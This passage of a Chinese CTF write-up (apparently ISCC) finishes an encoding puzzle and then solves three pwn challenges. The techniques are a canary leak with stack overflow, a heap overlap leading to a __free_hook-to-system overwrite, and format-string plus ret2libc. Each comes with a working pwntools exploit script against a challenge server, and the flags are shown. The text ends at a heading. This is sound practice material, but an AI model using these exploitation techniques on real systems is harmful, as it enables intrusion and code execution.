\u4f60\u9700\u8981\u627e\u5230\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5e8f\u5217\uff0c\n\u622a\u53d6\u8d77\u59cb\u4f4d\u4e3a m\uff0c\u957f\u5ea6\u4e3a n \u7684\u5b50\u5e8f\u5217\uff0c\n\u901a\u8fc7 base62 \u7f16\u7801\u5f97\u5230\u6700\u7ec8\u7684\u8c1c\u5e95<\/code><\/pre>\n\n\n\n
\u800c flag.txt<\/code> \u5f00\u5934\u7684\u5047 flag \u91cc\u5df2\u7ecf\u7ed9\u51fa\u53c2\u6570\uff1a<\/p>\n\n\n\n
M4403 ... N111<\/code><\/pre>\n\n\n\n
\u6240\u4ee5\u8fd9\u91cc\u5bf9\u5e94\u7684\u7d22\u5f15\u662f m=4403, n=111<\/code>\u3002\u6700\u540e\u4e00\u5c42\u8981\u4ece\u201c\u67d0\u4e2a\u4e8c\u8fdb\u5236\u5e8f\u5217\u201d\u4e2d\u622a\u53d6\u8fd9 111 bit\uff0c\u518d\u505a base62\u3002<\/p>\n\n\n\n
\u8fd9\u91cc\u4e0d\u80fd\u628a\u53ef\u89c1\u7684 flag={M4403wkhabdIfRxDN111}<\/code> \u76f4\u63a5\u5f53\u6700\u7ec8 flag\uff1b\u5b83\u540c\u65f6\u7ed9\u51fa\u4e86 m<\/code>\u3001n<\/code>\uff0c\u4e2d\u95f4\u7684 wkhabdIfRxD<\/code> \u66f4\u50cf\u5e72\u6270\/\u6821\u9a8c\u7247\u6bb5\u3002\u6309\u6700\u65b0\u63d0\u793a\u201c\u6bcf\u4e00\u6b21\u6536\u83b7\u90fd\u6709\u610f\u4e49\u201d\uff0c\u5e94\u56de\u5230\u7b2c\u4e00\u5c42\u771f\u6b63\u6536\u83b7\u5230\u7684\u4e8c\u8fdb\u5236\u5e8f\u5217\uff1asecret.dat<\/code> \u7684 hex nibble bit \u6d41\u3002<\/p>\n\n\n\n
RAR \u5bc6\u7801\u4e5f\u4e0d\u662f\u968f\u673a\u4e32\uff1a<\/p>\n\n\n\n
Yth9Ur062azZA09y4rs5L\n      ^ ^  ^  ^  ^\n      0 62 az ZA 09<\/code><\/pre>\n\n\n\n
\u4e2d\u95f4 0|62|az|ZA|09<\/code> \u53ef\u4ee5\u89e3\u6790\u4e3a\uff1a<\/p>\n\n\n\n
    \n
  • 0<\/code>\uff1a0-based \u8d77\u59cb\u4f4d\uff1b<\/li>\n\n\n\n
  • 62<\/code>\uff1abase62\uff1b<\/li>\n\n\n\n
  • azZA09<\/code>\uff1a\u5b57\u6bcd\u8868\u8303\u56f4 a-z + Z-A + 0-9<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n
    \u56e0\u6b64\u6700\u7ec8\u6b65\u9aa4\u662f\uff1a<\/p>\n\n\n\n
      \n
    1. \u53d6 secret.dat<\/code> \u7684\u539f\u59cb hex \u5b57\u7b26\u6d41\uff1b<\/li>\n\n\n\n
    2. \u6bcf\u4e2a hex \u5b57\u7b26\u5c55\u5f00\u4e3a 4-bit\uff0c\u5f97\u5230\u7b2c\u4e00\u5c42\u7684 nibble bit \u5e8f\u5217\uff1b<\/li>\n\n\n\n
    3. \u4ece 0-based bit offset 4403<\/code> \u622a\u53d6 111<\/code> bit\uff1b<\/li>\n\n\n\n
    4. \u7528\u5b57\u6bcd\u8868 abcdefghijklmnopqrstuvwxyzZYXWVUTSRQPONMLKJIHGFEDCBA0123456789<\/code> \u505a base62 \u7f16\u7801\u3002<\/li>\n<\/ol>\n\n\n\n
      \u5f97\u5230\uff1a<\/p>\n\n\n\n
      olp95YuuF73D5MsK6<\/code><\/pre>\n\n\n\n
      What Is Reused<\/p>\n\n\n\n
        \n
      • secret.dat<\/code> \u7684 4 \u8def bit \u62c6\u5206\uff0c\u7528\u6765\u63d0\u53d6 RAR \u5bc6\u7801\u3002<\/li>\n\n\n\n
      • truth.dat<\/code> \u7684\u83ab\u6bd4\u4e4c\u65af\u5f0f XOR\uff0c\u7528\u6765\u6062\u590d\u52a0\u5bc6 RAR\u3002<\/li>\n\n\n\n
      • flag.txt<\/code> \u7684\u96f6\u5bbd\u5b57\u7b26\uff0c\u7528\u6765\u6062\u590d PNG\u3002<\/li>\n\n\n\n
      • PNG \u91cc\u7684 m<\/code>\/n<\/code>\uff0c\u7528\u6765\u5b9a\u4f4d\u6700\u7ec8\u5e8f\u5217\u3002<\/li>\n<\/ul>\n\n\n\n
        flag\u6700\u7ec8\u5019\u9009\uff1a<\/p>\n\n\n\n
        flag={olp95YuuF73D5MsK6}<\/code><\/pre>\n\n\n\n
        Pwn<\/h2>\n\n\n\n
        stack<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732 + \u6808\u6ea2\u51fa<\/p>\n\n\n\n
        vuln\u51fd\u6570<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6808\u6ea2\u51fa\u70b9\uff1a\u6709\u4e2a read(0, buf, 0x200)\u3002\u770b\u53d8\u91cf\u5206\u5e03\uff0cbuf \u5728 ebp-0x70 \u7684\u4f4d\u7f6e\uff0c\u4f46\u8ba9\u4f60\u8bfb 0x200 \u5b57\u8282\uff0c\u6808\u6ea2\u51fa\u3002\u4f46\u7a0b\u5e8f\u5f00\u4e86 Canary\uff08\u80fd\u770b\u5230\u5e95\u5c42\u8c03\u4e86 __stack_chk_fail\uff09\uff0c\u6240\u4ee5\u4e0d\u80fd\u786c\u8986\u76d6\u3002\n\n\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff1a\u7d27\u63a5\u7740\u6709\u4e2a printf(buf)\uff0c\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u7528\u5b83\u6765\u628a Canary \u8bfb\u51fa\u6765\u3002\n\u540e\u95e8\uff1a\u51fd\u6570\u5217\u8868\uff0c\u6709getshell \u7684\u51fd\u6570\uff08\u5730\u5740 0x080491C6\uff09\u3002<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u601d\u8def<\/p>\n\n\n\n
        \u56e0\u4e3a vuln \u80fd\u8dd1\u4e24\u6b21\uff0c\u521a\u597d\u53ef\u4ee5\u914d\u5408\uff1a\n\n\u7b2c\u4e00\u8f6e\uff1a\u5229\u7528 printf(buf) \u6cc4\u9732 Canary\u3002buf \u5728 ebp-0x70\uff0cCanary \u5728 ebp-0xC\uff0c\u7b97\u4e00\u4e0b\u76f8\u5bf9\u6808\u9876\u7684\u504f\u79fb\u662f 31\uff0c\u76f4\u63a5\u53d1 %31$08x \u628a Canary \u641e\u51fa\u6765\u3002\u52a0\u4e2a nx00 \u622a\u65ad\uff0c\u4e0d\u7136\u63a5\u6536\u7684\u65f6\u5019\u5bb9\u6613\u5361\u6b7b\u3002\n\n\u7b2c\u4e8c\u8f6e\uff1a\u76f4\u63a5\u6808\u6ea2\u51fa\u3002\u57ab 100 \u5b57\u8282\u7684\u5783\u573e\u6570\u636e\u5230 Canary \u7684\u4f4d\u7f6e\uff080x70 - 0xC = 0x64\uff09\uff0c\u628a\u521a\u6cc4\u9732\u7684 Canary \u539f\u5c01\u4e0d\u52a8\u586b\u8fdb\u53bb\u7ed5\u8fc7\u68c0\u67e5\uff0c\u518d\u57ab 12 \u5b57\u8282\u8986\u76d6\u6389 saved ebp \u4e4b\u7c7b\u7684\uff0c\u6700\u540e\u628a\u8fd4\u56de\u5730\u5740\u6539\u5199\u6210 getshell \u5373\u53ef\u3002<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        from pwn import *\n\ncontext.arch = 'i386'\ncontext.os = 'linux'\n\nio = remote('39.96.193.120', 10004)\n\ngetshell_addr = 0x080491C6\n\nio.recvuntil(b\"Hello Hacker!n\")\n\nio.send(b\"LEAK:%31$08xnx00\")\n\nio.recvuntil(b\"LEAK:\")\nleaked_hex = io.recvline().strip()\ncanary = int(leaked_hex, 16)\n\npayload = b\"A\" * 100\npayload += p32(canary)\npayload += b\"B\" * 12\npayload += p32(getshell_addr)\n\nio.send(payload)\n\nio.interactive()<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{b5f45b42-afb3-44ea-93cd-a5da8bab3a20}<\/code><\/pre>\n\n\n\n
        test<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u4fdd\u62a4 \u5168\u5f00<\/p>\n\n\n\n
        main\u51fd\u6570<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u91cc\u901a\u8fc7\u89d2\u8272\u5207\u6362\u5b9e\u73b0teacher\u548cstudent\u4e24\u5957\u83dc\u5355<\/p>\n\n\n\n
        sub_1424 (\u5206\u914d\u5b66\u751f)<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8fd9\u91cc\u5e95\u5c42\u8fde\u7740\u8c03\u7528\u4e86\u4e24\u6b21 calloc\uff0cv2 \u62ff\u4e86 0x20\uff0cv3 \u62ff\u4e86 0x18\u3002\u5bf9\u5e94\u5230\u5806\u5185\u5b58\u4e0a\u5c31\u662f MAIN(0x30) \u548c SUB(0x20) \u4e24\u4e2a\u5757\u3002\u6240\u4ee5\u6bcf\u52a0\u4e00\u4e2a\u5b66\u751f\uff0c\u5806\u4e0a\u56fa\u5b9a\u6d88\u8017 0x50 \u5b57\u8282\u3002\u771f\u5b9e\u5b58\u653e comment_ptr\uff08\u8bc4\u8bed\u6307\u9488\uff09\u7684\u5730\u65b9\u5728 SUB \u5757\u7684 +8 \u504f\u79fb\u5904\u3002<\/code><\/pre>\n\n\n\n
        sub_1538 (\u968f\u673a\u6253\u5206)<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6263\u5206\u903b\u8f91\uff1a\u53ea\u8981\u7948\u7977\u8fc7\uff08pray_flag == 1\uff09\uff0c\u5206\u6570\u76f4\u63a5\u51cf10\u3002\n\u6f0f\u6d1e\u70b9\uff08\u6574\u6570\u4e0b\u6ea2\uff09\uff1a\u5206\u6570 v2 \u662f\u4e2a 32 \u4f4d signed int\uff0c\u521d\u59cb\u968f\u673a\u7ed9 0-9 \u5206\uff0c\u51cf 10 \u5fc5\u5b9a\u53d8\u8d1f\u6570\u3002\u5b58\u5165\u5806\u5185\u5b58\u65f6\u76f4\u63a5\u53d8\u6210\u7c7b\u4f3c 0xFFFFFFF6 \u8fd9\u79cd\u6781\u5927\u7684\u6b63\u6570\u3002<\/code><\/pre>\n\n\n\n
        sub_1C5B (\u67e5\u8bc4\u8bed \u7136\u540e \u89e6\u53d1\u5f69\u86cb)<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6f0f\u6d1e\u70b9\uff08\u7ed5\u8fc7\u65e0\u7b26\u53f7\u6bd4\u8f83\uff09\uff1aif ( *(_DWORD *)(... + 4LL) > 0x59u )\u3002\u6c47\u7f16\u91cc\u7528\u7684\u662f\u65e0\u7b26\u53f7\u7684 > 89\uff0c\u4e0a\u4e00\u6b65\u641e\u51fa\u6765\u7684\u5de8\u5927\u6b63\u6570\u5b8c\u7f8e\u7ed5\u8fc7\u68c0\u67e5\u3002\n\u5956\u52b1\u76f4\u63a5\u767d\u7ed9\u4e24\u6837\u4e1c\u897f\uff1a\n\u6253\u5370 MAIN \u5757\u7684\u5806\u5730\u5740\uff08Heap Leak\uff09\u3002\n\u8ba9\u7528\u6237\u8f93\u5165\u4e00\u4e2a\u5730\u5740\uff0c\u6267\u884c\u5355\u5b57\u8282 +1\u3002<\/code><\/pre>\n\n\n\n
        sub_131A<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8d1f\u8d23\u8bfb\u4f60\u8f93\u5165\u7684\u8981 +1 \u7684\u5730\u5740\u3002\n\u6f0f\u6d1e\u70b9\uff08Off-By-One\u622a\u65ad\uff09\uff1a\u627e n \u65f6\uff0c\u5b83\u4f1a\u5f3a\u884c\u628a n \u524d\u9762\u7684\u4e00\u4e2a\u5b57\u7b26\u6539\u6210 x00 (a2[i - 1] = 0;)\u3002\u53d1\u5730\u5740\u5fc5\u987b\u5728\u672b\u5c3e\u57ab\u4e00\u4e2a\u7a7a\u683c\uff08\u4f8b\u5982 f\"{addr} n\"\uff09\u5f53\u66ff\u6b7b\u9b3c\uff0c\u4e0d\u7136\u672b\u4f4d\u76f4\u63a5\u88ab\u5403\u6389\u5bfc\u81f4\u5730\u5740\u9519\u4f4d\u3002<\/code><\/pre>\n\n\n\n
        \u6574\u4f53\u5c31\u662f<\/p>\n\n\n\n
        \u6bcf\u6b21calloc\u4e24\u4e2a\u7ed3\u6784\u4f53\uff0cMAIN(calloc(1,0x20) -> 0x30 chunk)\u548cSUB(calloc(1,0x18) -> 0x20 chunk)\uff0c\u5b66\u751f\u6307\u9488\u5b58\u5165\u5168\u5c40\u6570\u7ec4\u3002\n\u968f\u673a\u6253\u5206\uff0c\u5982\u679c\u68c0\u6d4b\u5230\u5b66\u751f\u7948\u7977\u8fc7(pray_flag)\uff0c\u989d\u5916\u51cf10\u5206\u3002\u5206\u6570\u5b58\u50a8\u4e3adword(\u65e0\u7b26\u53f732\u4f4d)\uff0c\u521d\u59cb0\u51cf10\u4f1a\u6574\u6570\u4e0b\u6ea2\u53d8\u6210\u8d85\u5927\u6b63\u6570\u3002\n\u5b66\u751f\u89c6\u89d2\u9009\u98792\uff1a\u5982\u679c\u5206\u6570>89\u4e14reward_used==0\uff0c\u89e6\u53d1\u5956\u52b1\u2014\u2014\u6253\u5370\u5f53\u524d\u5b66\u751fMAIN\u7ed3\u6784\u4f53\u7684\u5806\u5730\u5740\uff0c\u7136\u540e\u8ba9\u4f60\u8f93\u5165\u4e00\u4e2a\u5730\u5740\uff0c\u5bf9\u8be5\u5730\u5740\u7684\u5b57\u8282\u503c+1\u3002\u6bcf\u4e2a\u5b66\u751f\u53ea\u80fd\u7528\u4e00\u6b21\u3002\n\u7b2c\u4e00\u6b21\u5199\u8bc4\u8bed\u65f6scanf\u8bfbsize\u518dcalloc\u5bf9\u5e94\u5927\u5c0f\uff1b\u4e4b\u540e\u7f16\u8f91\u76f4\u63a5read\u5230\u5df2\u6709\u7684comment_ptr\u3002\u8fd9\u91ccread\u7528\u7684\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u4f1a\u5728n\u524d\u4e00\u5b57\u8282\u5199x00\u3002\nfree\u6389\u5b66\u751f\u7684comment\u548c\u4e24\u4e2a\u7ed3\u6784\u4f53\uff0c\u4ece\u6570\u7ec4\u4e2d\u79fb\u9664\u3002<\/code><\/pre>\n\n\n\n
        \u6f0f\u6d1e\u70b9<\/p>\n\n\n\n
        \u6574\u6570\u4e0b\u6ea2\uff1ascore\u662fdword\uff0cpray\u540e\u7ed9\u5206\u989d\u5916-10\uff0c0-10\u4e0b\u6ea2\u4e3a0xFFFFFFF6\uff0c\u65e0\u7b26\u53f7\u6bd4\u8f83>89\u6210\u7acb\uff0c\u89e6\u53d1\u5956\u52b1\u3002\n\u4efb\u610f\u5730\u5740+1\u539f\u8bed\uff1a\u5956\u52b1\u7ed9\u4e86\u4e00\u6b21heap leak + \u4e00\u6b21\u4efb\u610f\u5730\u5740\u5b57\u8282+1\u7684\u673a\u4f1a\u3002\n\u5806\u5757\u91cd\u53e0\uff1a\u5229\u7528+1\u4fee\u6539S1\u7684comment_ptr\u7684\u7b2c\u4e8c\u5b57\u8282(+0x100\u504f\u79fb)\uff0c\u4f7f\u5176\u6307\u5411S2\u8bc4\u8bedchunk\u7684header\u4f4d\u7f6e\uff0c\u7136\u540e\u901a\u8fc7\u7f16\u8f91S1\u7684\u8bc4\u8bed\u6765\u4f2a\u9020chunk size\uff0c\u6784\u9020unsorted bin overlap\u3002<\/code><\/pre>\n\n\n\n
        \u601d\u8def<\/p>\n\n\n\n
        \u6574\u4f53\u662f unsorted bin overlap -> \u52ab\u6301\u7ed3\u6784\u4f53 -> __free_hook\u5199system \u7684\u94fe\u6761\u3002<\/p>\n\n\n\n
        \u521b\u5efa5\u4e2a\u5b66\u751f\uff0c\u7ed9S1\/S2\/S3\/S4\u5206\u522b\u5199\u8bc4\u8bed\uff08S2\u548cS3\u7684\u8bc4\u8bed\u75281023\u5b57\u8282\uff0cchunk size=0x410\uff0c\u8d85\u8fc7tcache\u8303\u56f4\uff09\n\u5b66\u751fS0\u7948\u7977 -> \u8001\u5e08\u6253\u5206\u89e6\u53d1\u4e0b\u6ea2 -> S0\u67e5\u770b\u8bc4\u8bed\u89e6\u53d1\u5956\u52b1\uff0c\u62ff\u5230\u5806\u5730\u5740leak\n\u5bf9S1\u7684SUB\u7ed3\u6784\u4f53\u4e2dcomment_ptr\u5b57\u6bb5\u7684\u7b2c2\u5b57\u8282+1\uff0c\u76f8\u5f53\u4e8e\u628acomment_ptr\u504f\u79fb+0x100\uff0c\u521a\u597d\u4eceS1\u8bc4\u8bed\u7684\u7528\u6237\u6570\u636e\u533a\u6ed1\u5230S2\u8bc4\u8bed\u7684chunk header\u5904\n\u901a\u8fc7\u7f16\u8f91S1\u8bc4\u8bed\uff0c\u5f80S2\u7684chunk header\u5199\u5165\u4f2a\u9020size=0x821\uff08S2+S3\u5408\u5e76=0x820\uff0c\u52a0P\u4f4d\uff09\uff0c\u7136\u540e\u53eb\u5bb6\u957ffree S2\n\u4f2a\u9020\u76840x820\u5927chunk\u8fdb\u5165unsorted bin\uff0c\u901a\u8fc7S1\u8bfb\u53d6\u504f\u79fb\u5904\u7684fd\u6307\u9488\u6cc4\u9732libc\n\u518d\u6dfb\u52a0\u4e00\u4e2a\u5b66\u751f\uff0ccalloc\u4eceunsorted bin\u5207\u5272\u51fa\u65b0\u7684MAIN\u548cSUB\u7ed3\u6784\u4f53\n\u518d\u6b21\u7f16\u8f91S1\u8bc4\u8bed\uff0c\u8986\u5199\u65b0\u5b66\u751f\u7684SUB\u7ed3\u6784\u4f53\uff0c\u628acomment_ptr\u52ab\u6301\u5230__free_hook\uff0c\u540c\u65f6\u4fee\u590d\u6b8b\u4f59unsorted bin chunk\u7684header\n\u7f16\u8f91\u65b0\u5b66\u751f\u7684\u8bc4\u8bed -> \u5b9e\u9645\u5199\u5165__free_hook = system\n\u521b\u5efa\u4e00\u4e2a\u5b66\u751f\u5199\u8bc4\u8bed\"cat \/flag*\"\uff0c\u53eb\u5bb6\u957f\u89e6\u53d1free -> system(\"cat \/flag*\")<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        #!\/usr\/bin\/env python3\nfrom pwn import *\n\ncontext.arch = 'amd64'\ncontext.os = 'linux'\ncontext.log_level = 'info'\n\nelf = ELF('.\/attachment-35')\nlibc = ELF('.\/attachment-35.so')\np = remote('39.96.193.120', 10008)\n\ndef teacher_add_student(qs):\n    p.sendlineafter(b\"choice>> \", b\"1\")\n    p.sendlineafter(b\"enter the number of questions: \", str(qs).encode())\n\ndef teacher_give_score():\n    p.sendlineafter(b\"choice>> \", b\"2\")\n\ndef teacher_write_review_new(idx, size, content):\n    p.sendlineafter(b\"choice>> \", b\"3\")\n    p.sendlineafter(b\"which one? > \", str(idx).encode())\n    p.sendlineafter(b\"please input the size of comment: \", str(size).encode())\n    p.sendafter(b\"enter your comment:n\", content)\n\ndef teacher_write_review_edit(idx, content):\n    p.sendlineafter(b\"choice>> \", b\"3\")\n    p.sendlineafter(b\"which one? > \", str(idx).encode())\n    p.sendafter(b\"enter your comment:n\", content)\n\ndef teacher_call_parent(idx):\n    p.sendlineafter(b\"choice>> \", b\"4\")\n    p.sendlineafter(b\"which student id to choose?n\", str(idx).encode())\n\ndef change_role(role):\n    p.sendlineafter(b\"choice>> \", b\"5\")\n    p.sendlineafter(b\"role: <0.teacher\/1.student>: \", str(role).encode())\n\ndef student_change_id(idx):\n    p.sendlineafter(b\"choice>> \", b\"6\")\n    p.sendlineafter(b\"input your id: \", str(idx).encode())\n\ndef student_pray():\n    p.sendlineafter(b\"choice>> \", b\"3\")\n\ndef exploit():\n    p.sendlineafter(b\"role: <0.teacher\/1.student>: \", b\"0\")\n\n    for _ in range(5):\n        teacher_add_student(1)\n\n    teacher_write_review_new(1, 256, b\"A\" * 256)\n    teacher_write_review_new(2, 1023, b\"B\" * 1023)\n    teacher_write_review_new(3, 1023, b\"C\" * 1023)\n    teacher_write_review_new(4, 24, b\"D\" * 24)\n\n    change_role(1)\n    student_change_id(0)\n    student_pray()\n    change_role(0)\n    teacher_give_score()\n\n    change_role(1)\n    student_change_id(0)\n    p.sendlineafter(b\"choice>> \", b\"2\")\n    p.recvuntil(b\"Good Job! Here is your reward! \")\n    leak = int(p.recvline().strip(), 16)\n    log.success(f\"Heap leak: {hex(leak)}\")\n\n    addr_to_inc = leak + 0x89\n    payload = f\"{addr_to_inc} n\".encode()\n    p.sendafter(b\"add 1 to wherever you want! addr: \", payload)\n    p.recvuntil(b\"no reviewing yet!n\")\n\n    change_role(0)\n    payload = p64(0) + p64(0x821)\n    payload = payload.ljust(256, b'x00')\n    teacher_write_review_edit(1, payload)\n\n    teacher_call_parent(2)\n\n    change_role(1)\n    student_change_id(1)\n    p.sendlineafter(b\"choice>> \", b\"2\")\n    p.recvuntil(b\"here is the review:n\")\n    review = p.recv(256, timeout=5)\n\n    main_arena_unsorted = u64(review[16:24])\n    libc.address = main_arena_unsorted - (libc.sym['__malloc_hook'] + 0x10 + 0x60)\n    log.success(f\"Libc base: {hex(libc.address)}\")\n\n    change_role(0)\n    teacher_add_student(1)\n\n    payload = b\"\"\n    payload += p64(0)\n    payload += p64(0x31)\n    payload += p64(leak + 0x2D0)\n    payload += p64(0)\n    payload += p64(0)\n    payload += p64(0)\n    payload += p64(0)\n    payload += p64(0x21)\n    payload += p64(0)\n    payload += p64(libc.sym['__free_hook'])\n    payload += p32(0x100)\n    payload += p32(0)\n    payload += p64(0x7D1)\n    payload += p64(main_arena_unsorted)\n    payload += p64(main_arena_unsorted)\n    payload = payload.ljust(256, b'x00')\n    teacher_write_review_edit(1, payload)\n\n    payload = p64(libc.sym['system'])\n    payload = payload.ljust(0x100, b'x00')\n    teacher_write_review_edit(4, payload)\n\n    teacher_add_student(1)\n    cmd = b\"cat \/flag*x00\"\n    cmd = cmd.ljust(32, b'x00')\n    teacher_write_review_new(5, 32, cmd)\n    teacher_call_parent(5)\n\n    log.success(\"Done!\")\n    try:\n        output = p.recvrepeat(3)\n        log.success(f\"Output: {output}\")\n    except:\n        pass\n    p.interactive()\n\nif __name__ == \"__main__\":\n    exploit()<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{78ee85bf-0c44-4022-bd74-da2e89c9bdf0}<\/code><\/pre>\n\n\n\n
        permission<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6ca1\u6709\u7ed9Lib \u9700\u8981\u76f2\u731c\uff0c\u8dd1\u51fa10\u4e2alibc\u8fd8\u5f97\u6328\u4e2a\u8bd5\uff0c\u7528 system(\"sh\")<\/code> \u6216 \/bin\/sh<\/code><\/p>\n\n\n\n
        main<\/code> \u51fd\u6570<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3002\u7ed9\u4e8632\u5b57\u8282\u8bfb\u5165\uff0c\u6ca1\u6709\u683c\u5f0f\u5316\u7b26\u8fc7\u6ee4\uff0c\u76f4\u63a5 printf(s)<\/code>\u3002\u5b8c\u4e8b\u5224\u65ad\u5168\u5c40\u53d8\u91cf x<\/code> (\u5730\u5740 0x804C030<\/code>) \u662f\u4e0d\u662f 5\uff0c\u662f\u7684\u8bdd\u8fdb\u6f0f\u6d1e\u51fd\u6570\u3002<\/p>\n\n\n\n
        vuln<\/code> \u51fd\u6570<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7f13\u51b2\u533a\u79bb ebp \u8ddd\u79bb\u662f 0x90\uff08144\u5b57\u8282\uff09\uff0c\u4f46\u7ed9\u4e86 0x100 \u7684\u8bfb\u5165\u957f\u5ea6\uff0c\u591f\u5199 ROP \u94fe\u4e86\u3002<\/p>\n\n\n\n
        \u89e3<\/p>\n\n\n\n
        \u5229\u7528Fmt\u6539\u53d8\u91cf + \u6cc4\u9732libc\n\u5728 main \u91cc\uff0c\u5229\u7528 %n \u628a x \u8986\u76d6\u6210 5 \u7ed5\u8fc7\u68c0\u67e5\uff0c\u540c\u65f6\u7528 %s \u987a\u624b\u628a puts \u7684 GOT \u8868\u6cc4\u9732\u51fa\u6765\u3002\n\u7b97\u4e00\u4e0b\u504f\u79fb\uff0c\u6211\u4eec\u6784\u9020\u7684\u5730\u5740\u5206\u522b\u5728\u7b2c8\u548c\u7b2c9\u4e2a\u53c2\u6570\u4f4d\u7f6e\u3002\npayload: %5c%8$nB%9$sB + padding + p32(x) + p32(puts_got)\n\u6253\u5b8c\u5c31\u80fd\u987a\u5229\u8fdb\u5165 vuln \u5e76\u62ff\u5230 libc \u5730\u5740\u3002\n\n\u6808\u6ea2\u51fa ret2libc\n\u8fdb\u5165 vuln \u540e\uff0c\u6839\u636e\u6cc4\u9732\u7684 puts \u7b97\u504f\u79fb\uff0c\u62ff system \u548c bin\/sh \u7684\u5730\u5740\u3002\n\u6808\u5e27\u5e03\u5c40\u662f 144\u5b57\u8282\u7684buf + 4\u5b57\u8282\u7684ebp = 148 \u5b57\u8282\u3002\n\u586b\u6ee1 148 \u5b57\u8282\u540e\u76f4\u63a5\u63a5 system \u5730\u5740 -> fake return address -> binsh \u5730\u5740\u3002\n\u6d4b\u8bd5\u6700\u540e\u5f97\u9009\u5bf9 libc6-i386_2.31-0ubuntu9.16_amd64\uff08\u9009\u98799\uff09\u624d\u80fd\u62ff\u5230 flag\u3002<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        from pwn import *\nfrom LibcSearcher import LibcSearcher\n\ncontext.arch = 'i386'\ncontext.os = 'linux'\n\nelf = ELF('.\/attachment-9')\nio = remote('39.96.193.120', 10000)\n\ntarget_val_addr = 0x0804C030\nputs_got = elf.got['puts']\n\nfmt = b\"%5c%8$nB%9$sBx00x00x00\" + p32(target_val_addr) + p32(puts_got)\n\nio.recvuntil(b\"time here.n\")\nio.send(fmt)\n\nout = io.recvuntil(b\"Input:n\")\nidx = out.find(b\"B\")\nputs_leak = u32(out[idx+1:idx+5].ljust(4, b'x00'))\n\nlibc = LibcSearcher('puts', puts_leak)\nlibc_base = puts_leak - libc.dump('puts')\nsystem_addr = libc_base + libc.dump('system')\nbinsh_addr = libc_base + libc.dump('str_bin_sh')\n\nrop = b\"A\" * 148 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)\n\nio.send(rop)\nio.interactive()<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{fb366f16-9e6f-4962-9ee4-b7e4196e6a98}<\/code><\/pre>\n\n\n\n
        \u8fd9\u4e2a\u4e5f\u884c<\/p>\n\n\n\n
        Fmt\u7cbe\u51c6\u8986\u5199 + \u6808\u5e95\u6cc4\u9732\n\u6784\u9020 %4$hhn \u5355\u5b57\u8282\u5199\u5165\uff0c\u914d\u5408\u524d\u9762\u8f93\u51fa\u7684\u957f\u5ea6\u7cbe\u51c6\u628a 5 \u5199\u8fdb\u76ee\u6807\u53d8\u91cf\uff0c\u7ed5\u8fc7 check \u8fdb\u5165 vuln\u3002\u7d27\u63a5\u7740\u8ddf\u4e0a %15$p\uff0c\u4e0d\u8bfb GOT \u8868\u4e86\uff0c\u76f4\u63a5\u628a\u6808\u5e95\u5b58\u7740\u7684 __libc_start_main_ret \u5730\u5740\u638f\u51fa\u6765\uff08\u56fe\u91cc\u7684 0xf7dd3ed5\uff09\u3002\n\n\u8ba1\u7b97\u57fa\u5740\n\u62ff\u5230\u6cc4\u6f0f\u7684\u6307\u9488\u540e\u770b\u4f4e 12 \u4f4d\u7279\u5f81\uff08ed5\uff09\uff0c\u51cf\u53bb\u63d0\u524d\u627e\u597d\u7684\u8be5\u7248\u672c libc \u5bf9\u5e94\u7684\u56fa\u5b9a\u504f\u79fb 0x01aed5\uff0c\u7b97\u51fa libc_base\uff08\u56fe\u91cc\u7684 0xf7db9000\uff09\u3002\u7136\u540e\u52a0\u4e0a\u5bf9\u5e94\u7248\u672c\u7684 system \u548c binsh \u504f\u79fb\uff0c\u7b97\u51fa\u5730\u5740\u3002\u4e0d\u5f39\u83dc\u5355\uff0c\u4e00\u904d\u8fc7\u3002\n\nret2libc\nvuln \u51fd\u6570\u5b58\u5728\u88f8\u6808\u6ea2\u51fa\uff0c148\u5b57\u8282\u5783\u573e\u6570\u636e\u586b\u5e73\u7f13\u51b2\u533a\u5e76\u76d6\u6389 ebp\uff0c\u76f4\u63a5\u62fc\u63a5\u7b97\u597d\u7684 system\u5730\u5740 -> 4\u5b57\u8282\u5783\u573e\u6570\u636e\u505a\u5047\u8fd4\u56de -> \/bin\/sh\u5730\u5740\uff0c\u4e00\u628a\u68ad\u62ff flag\u3002<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
